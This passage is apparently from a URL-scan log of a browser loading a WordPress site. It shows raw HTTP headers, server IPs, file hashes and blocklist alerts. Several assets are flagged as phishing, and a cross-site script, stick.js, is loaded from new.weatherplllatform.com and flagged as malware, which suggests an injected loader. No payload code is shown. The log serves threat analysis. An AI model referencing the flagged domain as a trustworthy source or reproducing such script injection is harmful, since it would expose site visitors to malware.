Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.27
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Thu, 14 Oct 2021 19:01:02 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 996
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (4224), with no line terminators
Size:   996
Md5:    2f786324d141c7293bdd07aed333968f
Sha1:   a803f868da0756bbf1d2c1d0655262df96a6b19c
Sha256: c8c307319b0b75a7c358307b354e3de33b53bde355e3b8f38ae1b04630a3a7e7
                                        
                                            GET /wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.4.6.3.1 HTTP/1.1 
Host: triumphinvestigativeservicesllc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.27
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Thu, 14 Oct 2021 18:56:30 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 6856
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (29701), with CRLF line terminators
Size:   6856
Md5:    1adf583a268e30aaaed46550b156467c
Sha1:   6a785895330c86950708fe91b507a2e7803eb8be
Sha256: 25dde0693ac14abf231374b31feb6f7a8e4e7687640d1c013e3336ad03d1283f
                                        
                                            GET /wp-content/uploads/smile_fonts/Defaults/Defaults.css?ver=6.1.1 HTTP/1.1 
Host: triumphinvestigativeservicesllc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.27
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Thu, 14 Oct 2021 18:58:05 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 4453
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (27639), with no line terminators
Size:   4453
Md5:    9a93ae1de173786cb8670757ce07ed80
Sha1:   170b12a94a2ca458187d9f25c707c3f870bec587
Sha256: b260eed4f4b87de1f3bbdbf96abfb9c75eba4ae837e75cf089bf52e2ef26108d

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/plugins/Ultimate_VC_Addons/assets/min-css/style.min.css?ver=3.16.20 HTTP/1.1 
Host: triumphinvestigativeservicesllc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.27
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Thu, 14 Oct 2021 18:57:50 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 2589
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (13120), with no line terminators
Size:   2589
Md5:    59b798d32f197ea7d262142759028880
Sha1:   7692ac7ae52b6b3157eae18315d5564977319fe3
Sha256: 74f0e6b4b95c0664cec0ede4f3bab4220795ccc4ff2969ee999eb33a51f15040

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/plugins/Ultimate_VC_Addons/assets/min-css/animate.min.css?ver=3.16.20 HTTP/1.1 
Host: triumphinvestigativeservicesllc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.27
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Thu, 14 Oct 2021 18:57:50 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 5315
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (64385), with CRLF line terminators
Size:   5315
Md5:    e7523a2ac28478012d103baf4a862383
Sha1:   3c38a1429969faba810fcb9d10d5b65ecdca6522
Sha256: 02cf680e235017a8f7995e20f36a01e2ed8adf91bc1a9ae8b925e3a763e85276
                                        
                                            GET /wp-content/plugins/Ultimate_VC_Addons/assets/min-css/info-box.min.css?ver=3.16.20 HTTP/1.1 
Host: triumphinvestigativeservicesllc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.27
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Thu, 14 Oct 2021 18:57:50 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 726
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (4226), with no line terminators
Size:   726
Md5:    cccfc375a4b7c23c0b71a987977211fb
Sha1:   1fc21746e1a1859abf1f6edcb47d6e78662c554f
Sha256: 54c1a866ee8cb7d5eec36d5e990e63eb476550da00d9e01a1ff6946ae11c6290

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/plugins/Ultimate_VC_Addons/assets/min-css/tooltip.min.css?ver=3.16.20 HTTP/1.1 
Host: triumphinvestigativeservicesllc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.27
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Thu, 14 Oct 2021 18:57:50 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 355
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (1722), with no line terminators
Size:   355
Md5:    8b21080f21d849ab9195b6d9b0fcb2c0
Sha1:   8b64cf542df285e1e8d9b63809709c9800b74e23
Sha256: 14df78e66e879afd052f2a7bc8e44eb8696f6669fff23489bbbb92288504a423
                                        
                                            GET /wp-content/plugins/Ultimate_VC_Addons/assets/min-css/pricing.min.css?ver=3.16.20 HTTP/1.1 
Host: triumphinvestigativeservicesllc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.27
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Thu, 14 Oct 2021 18:57:50 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 2140
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (19727), with no line terminators
Size:   2140
Md5:    f4e58bea72fb6492b3a8b4dba3bf7196
Sha1:   bc3083ca8fb8dc08cc4c72ea28ffb1bdcf6ba6a1
Sha256: e108b37164778bb7d7435c7c8c2ca9a610ddfe86897a96f47590b436a8558d0d
                                        
                                            GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 HTTP/1.1 
Host: triumphinvestigativeservicesllc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.27
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Fri, 04 Nov 2022 04:57:04 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 5329
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (11126)
Size:   5329
Md5:    27caf644710e18abaa6e9a6f9f69a153
Sha1:   65b5863671e5f02eea7ba47a872e2c35fb9de86a
Sha256: 4ec315ca9e66bf8925f0a7da38cf19a5bd7375ccd98befb14940dacb88e77d93

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/themes/the-guard/js/modernizr.custom.57510.js?ver=6.1.1 HTTP/1.1 
Host: triumphinvestigativeservicesllc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.27
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Thu, 14 Oct 2021 18:55:42 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 6368
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document, ASCII text, with very long lines (12015), with CRLF, LF line terminators
Size:   6368
Md5:    83a28b1843349f93ba64f39bf6dd37f2
Sha1:   4e7ec87aa99ac0185f2b80f40c0e218a97c61e62
Sha256: 6c039853b43bc764af691d55da05fb9e4e7293c9c59516a3f1fcaec14ffa844d
                                        
                                            GET /wp-content/plugins/responsive-lightbox/assets/swipebox/jquery.swipebox.min.js?ver=2.3.3 HTTP/1.1 
Host: triumphinvestigativeservicesllc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.27
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Thu, 14 Oct 2021 19:01:02 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 4928
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (12939)
Size:   4928
Md5:    f4ecc7ee8d0efc1a96a42fe720e92bc6
Sha1:   ffa79362a0b85af53e98959104f8d73792e4950e
Sha256: f4d21437bed9492d3aaa0e4bf0e06dc7454af6252a0c73b0dfe4dcc06af16191
                                        
                                            GET /wp-includes/js/underscore.min.js?ver=1.13.4 HTTP/1.1 
Host: triumphinvestigativeservicesllc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.27
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Fri, 04 Nov 2022 04:57:04 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 8519
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (18820)
Size:   8519
Md5:    2567317f433be2a1a4fbadfd978315a0
Sha1:   7c039fee4862e5946f8eb03436d57cde26d4dea6
Sha256: 6b62e4aeb3100e67d506c6c9c7d9b403500e0d7f20effc50595b52fbc4c236c5
                                        
                                            GET /wp-content/plugins/responsive-lightbox/assets/infinitescroll/infinite-scroll.pkgd.min.js?ver=6.1.1 HTTP/1.1 
Host: triumphinvestigativeservicesllc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.27
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Thu, 14 Oct 2021 19:01:02 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 8127
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (25603), with CRLF, LF line terminators
Size:   8127
Md5:    d5729e40d87fb8a3c2c74a7384a66d47
Sha1:   4ded62726c04644a27f63d2023d3547a1dedb6cf
Sha256: 2363ebb650106922f6077bcc3fab0c15ae4afaa5ae30d012c9c6f2a822a7e8b5

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/plugins/responsive-lightbox/js/front.js?ver=2.3.3 HTTP/1.1 
Host: triumphinvestigativeservicesllc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.27
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Thu, 14 Oct 2021 19:01:02 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 6614
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with very long lines (641), with CRLF, LF line terminators
Size:   6614
Md5:    edb09a5b05154c49dcca74eaa64b9929
Sha1:   9fc70ce188c3f5e3ad0bca46daacfe67aff533a4
Sha256: 340bcdf028ec146517b78de921121cc335c2c5aa955c4b941b79377933d89211
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "EF0F5B2AB2055446D4EA8B738F605C3BF835CF72E872D6A9C9A6C9B2917737E7"
Last-Modified: Sat, 03 Dec 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=9518
Expires: Sun, 04 Dec 2022 16:31:16 GMT
Date: Sun, 04 Dec 2022 13:52:38 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "EF0F5B2AB2055446D4EA8B738F605C3BF835CF72E872D6A9C9A6C9B2917737E7"
Last-Modified: Sat, 03 Dec 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=9518
Expires: Sun, 04 Dec 2022 16:31:16 GMT
Date: Sun, 04 Dec 2022 13:52:38 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "EF0F5B2AB2055446D4EA8B738F605C3BF835CF72E872D6A9C9A6C9B2917737E7"
Last-Modified: Sat, 03 Dec 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=9518
Expires: Sun, 04 Dec 2022 16:31:16 GMT
Date: Sun, 04 Dec 2022 13:52:38 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "EF0F5B2AB2055446D4EA8B738F605C3BF835CF72E872D6A9C9A6C9B2917737E7"
Last-Modified: Sat, 03 Dec 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=9518
Expires: Sun, 04 Dec 2022 16:31:16 GMT
Date: Sun, 04 Dec 2022 13:52:38 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "EF0F5B2AB2055446D4EA8B738F605C3BF835CF72E872D6A9C9A6C9B2917737E7"
Last-Modified: Sat, 03 Dec 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=9518
Expires: Sun, 04 Dec 2022 16:31:16 GMT
Date: Sun, 04 Dec 2022 13:52:38 GMT
Connection: keep-alive

                                        
                                            GET /stick.js?v=9.00 HTTP/1.1 
Host: new.weatherplllatform.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         91.211.91.114
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
server: nginx
date: Sun, 04 Dec 2022 13:52:38 GMT
last-modified: Sun, 06 Nov 2022 00:27:12 GMT
vary: Accept-Encoding
etag: W/"6366ff60-a40"
expires: Thu, 31 Dec 2037 23:55:55 GMT
cache-control: max-age=315360000
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   17270
Md5:    79d05cd02038bb248d24d4af4fe73c8a
Sha1:   2780c99d5649960cc2df3ee149d75e000afb7948
Sha256: 880eb6b85d6be5c631e7c9e35112b679a99611f0e47e3fa4bb5463251b6286cb

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fae18d1b5-3b75-4897-bd1b-03651e437c2e.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 4666
x-amzn-requestid: 850d341f-5ccb-453c-8adf-a8194f8fbdad
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: clr_-GiboAMFwww=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-638bc066-766293f2526e637235067aca;Sampled=0
x-amzn-remapped-date: Sat, 03 Dec 2022 21:32:22 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: z5uqgjB-Bsl0U55a8aFi37cpJ65Vnbjm6bJ2GnMpaO7RXsMZsOCbPQ==
via: 1.1 112c6b3f9aea37a6cb00b7d933e5af6e.cloudfront.net (CloudFront), 1.1 b2f9564ebf9c745cc2ceae96d434977e.cloudfront.net (CloudFront), 1.1 google
date: Sat, 03 Dec 2022 21:44:01 GMT
age: 58117
etag: "a9a529dc9894827f6243a1bf57f81caa4fe88fc2"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   4666
Md5:    c01fe1cccdb3b672bbade6d98217ffe9
Sha1:   a9a529dc9894827f6243a1bf57f81caa4fe88fc2
Sha256: c43da6212c79a08e22e78e04e99e8f5422e64b4b0a87f30b7907f1b4bc675c71
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F19c9bb39-be15-49f9-aad9-2cc511601111.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 8989
x-amzn-requestid: abce0b01-f70c-42ad-b242-5a24735fe4c2
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cltl4Gk2oAMFSWQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-638bc2f2-1cccffff5199dffe70264a95;Sampled=0
x-amzn-remapped-date: Sat, 03 Dec 2022 21:43:14 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: PFl7VUrzRkMFNnTiIw_cbGCyrEFn43eUSlZfT0nUhUmjjyXT7JfjMA==
via: 1.1 eece508272520f70691e4eebdc5a6dea.cloudfront.net (CloudFront), 1.1 d8792dbd3191bbe722eba5b536b979c8.cloudfront.net (CloudFront), 1.1 google
date: Sat, 03 Dec 2022 21:50:01 GMT
age: 57757
etag: "fc5d4f3163ebb9faf85968cbb1d194e8e68418be"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   8989
Md5:    a6e7b32ac999cf3c899a234c621fa91a
Sha1:   fc5d4f3163ebb9faf85968cbb1d194e8e68418be
Sha256: f12db3aed126006fee00649aba0b3eaae900de200b85b9523866a90b5494f18e
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fd528f6ee-d348-431d-8220-5c8b154b2941.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 8315
x-amzn-requestid: f1bcc33b-aad9-4d3b-b1f9-49282f2d4fb9
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
